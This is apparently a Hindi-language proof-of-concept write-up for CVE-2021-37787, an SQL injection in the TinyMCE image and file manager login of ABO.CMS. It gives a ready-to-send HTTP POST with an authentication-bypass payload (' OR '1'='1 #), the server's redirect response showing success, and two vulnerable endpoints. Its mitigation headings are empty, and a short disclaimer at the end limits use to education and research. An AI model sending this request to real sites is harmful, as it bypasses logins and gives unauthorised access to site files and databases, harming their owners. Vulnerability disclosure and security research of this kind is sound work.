
CVE-2021-37787
ABOCMS में TinyMCE मॉड्यूल के अंदर एक गंभीर SQL इंजेक्शन भेद्यता मौजूद है। यह भेद्यता TinyMCE मॉड्यूल के डेटाबेस के साथ इंटरैक्शन में अपर्याप्त इनपुट स्वच्छता के कारण उत्पन्न होती है, जिससे हमलावर दुर्भावनापूर्ण SQL क्वेरी इंजेक्ट कर सकता है। इससे अनधिकृत डेटा एक्सेस, संशोधन या यहां तक कि अंतर्निहित डेटाबेस से पूर्ण समझौता हो सकता है।
कमजोर एंडपॉइंट TinyMCE मॉड्यूल के उपयोगकर्ता-आपूर्ति किए गए इनपुट के प्रसंस्करण में स्थित है। एक हमलावर इस दोष का शोषण करके मनमाने SQL कमांड निष्पादित कर सकता है।
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded
return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html
भेद्यता को निम्नलिखित एंडपॉइंट के माध्यम से ट्रिगर किया जा सकता है:
/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php
उपयोगकर्ताओं के लिए:
डेवलपर्स के लिए:
यह PoC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्वामी की स्पष्ट अनुमति के बिना सिस्टम या नेटवर्क को नुकसान पहुंचाने के लिए इस कोड का उपयोग न करें। लेखक इस PoC के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।